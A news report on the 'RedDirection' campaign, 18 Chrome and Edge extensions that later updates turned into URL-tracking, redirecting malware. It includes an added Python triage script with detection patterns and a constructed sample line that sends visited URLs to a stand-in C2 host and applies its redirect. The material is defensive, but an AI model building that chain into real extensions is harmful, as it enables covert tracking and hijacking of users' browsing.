A set of 18 malicious browser extensions that are still available to download on Google Chrome and Microsoft Edge have been identified by a team of security researchers at Koi Security.
These extensions masquerade as productivity and entertainment tools across diverse categories, including emoji keyboards, weather forecasts, video speed controllers, VPN proxies for Discord and TikTok, dark themes, volume boosters and YouTube unblockers.
Each offers the functional service it advertises while secretly implementing browser surveillance and hijacking capabilities. Together they have infected over 2.3 million browser users to date.
Several of these extensions were verified by Google and Microsoft or had featured placement on the Chrome Web Store or the Edge Add-ons Store.
While each extension operates with its own command and control subdomain, giving the appearance of separate operators, the researchers discovered that the 18 extensions are all part of the same centralized attack infrastructure.
The campaign has been dubbed RedDirection, and Koi Security shared its findings in a July 8 report on researcher Idan Dardikman’s Medium page.
Legitimate Extensions Turned Malicious in Later Updates
The first extension the Koi Security researchers identified, named ‘Color Picker, Eyedropper — Geco colorpick,’ appears as a seemingly benign Chrome extension with over 100,000 installs and over 800 reviews.
In reality, this extension also delivers a malicious command-and-control (C2) backdoor, allowing an attacker to track every website visited by its users.
Upon finding this extension, Idan Dardikman and his fellow researchers at Koi Security dug deeper.
They found 11 Chrome extensions and seven Edge extensions with similar capabilities.
To avoid being blocked by Google’s and Microsoft’s security filters, the RedDirection extensions were initially published as clean extensions and later updated with malware in subsequent versions that installed automatically, with no user input – sometimes years after the initial version was released.
“Google’s and Microsoft’s verification process failed to detect sophisticated malware across eleven different extensions, instead promoting several to users through verification badges and featured placement,” Dardikman explained.
The malicious code that was added to the extensions allows an attacker to:
- Capture the URLs of the pages the users visit
- Send them to a remote server along with the users’ unique tracking IDs
- Receive potential redirect URLs from the C2 server
- Automatically redirect the browser if instructed
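The chain above (hook navigation, exfiltrate the URL, apply a server-supplied redirect) is what a defender should look for when triaging an unpacked extension. The script below is an added example, not code from the report or from any of the extensions; it assumes the standard `chrome.tabs` / `webNavigation` API names and scores constructed samples, including a benign extension whose hypothetical later update adds the full chain, mirroring the update-based delivery described above.

```python
import re

# Heuristic triage for the RedDirection-style behaviour described above: hook tab
# navigation, ship the URL to a remote host, and apply a redirect the server returns.
# The chrome.* API names are the standard extension APIs; that this campaign used
# exactly these calls is an assumption, not a detail taken from the report.
NAV_HOOKS = (r"tabs\.onUpdated", r"webNavigation\.on(Committed|Completed)")
EXFIL_CALLS = (r"\bfetch\s*\(", r"XMLHttpRequest", r"sendBeacon\s*\(")
REDIRECT_CALLS = (r"tabs\.update\s*\(", r"location\.(href|replace|assign)")
REMOTE_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)
RISKY_PERMS = {"tabs", "webNavigation", "webRequest", "<all_urls>"}

def triage(manifest: dict, scripts: dict) -> dict:
    """Score an unpacked extension from its manifest and {filename: source} scripts."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    source = "\n".join(scripts.values())
    hosts = sorted({m.group(1).lower() for m in REMOTE_HOST.finditer(source)})
    reasons, score = [], 0
    for patterns, label in ((NAV_HOOKS, "hooks tab navigation events"),
                            (EXFIL_CALLS, "sends data to a network endpoint"),
                            (REDIRECT_CALLS, "can rewrite a tab's location")):
        if any(re.search(p, source) for p in patterns):
            reasons.append(label)
            score += 1
    # Only the complete chain plus a hard-coded remote host and broad permissions
    # separates remote-controlled redirecting from an extension that does one of these.
    if score == 3 and hosts and perms & RISKY_PERMS:
        reasons.append("navigation -> exfil -> remote redirect chain with fixed host")
        score += 2
    return {"name": manifest.get("name", "?"), "version": manifest.get("version", "?"),
            "risky_permissions": sorted(perms & RISKY_PERMS), "remote_hosts": hosts,
            "score": score, "reasons": reasons}

# Constructed samples (not code from any real extension): a benign picker, and the
# same extension after a hypothetical update that added the surveillance chain.
BENIGN = ({"name": "Demo Color Picker", "version": "1.0", "permissions": ["storage"]},
          {"popup.js": "chrome.storage.local.set({last: pick()});"})
UPDATED = ({"name": "Demo Color Picker", "version": "1.4",
            "permissions": ["storage", "tabs"], "host_permissions": ["<all_urls>"]},
           {"background.js": "chrome.tabs.onUpdated.addListener(onNav);\n"
                             "// ... fetch('https://c2.example.invalid/check?u=' + url) ...\n"
                             "// ... chrome.tabs.update(tabId, {url: reply.redirect}) ..."})

if __name__ == "__main__":
    for manifest, scripts in (BENIGN, UPDATED):
        f = triage(manifest, scripts)
        print(f"{f['name']} v{f['version']}: score={f['score']} hosts={f['remote_hosts']} {f['reasons']}")
```

Running it against both versions of the same extension shows why a clean first review is not enough: the score jumps only after the update, so checks have to be repeated on every new version.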
This campaign “perfectly demonstrates how sophisticated threat actors are exploiting the trust signals we rely on,” wrote Dardikman in the report.
For Chrome and Edge users who have one of the 18 malicious extensions installed, Dardikman recommended immediately removing them, clearing the browser data to remove stored tracking identifiers, running a complete system malware scan to check for additional infections and monitoring their accounts for any suspicious activity if they visited sensitive sites.
The Koi Security team of researchers reported their findings to Google and Microsoft, but neither company responded at the time of writing.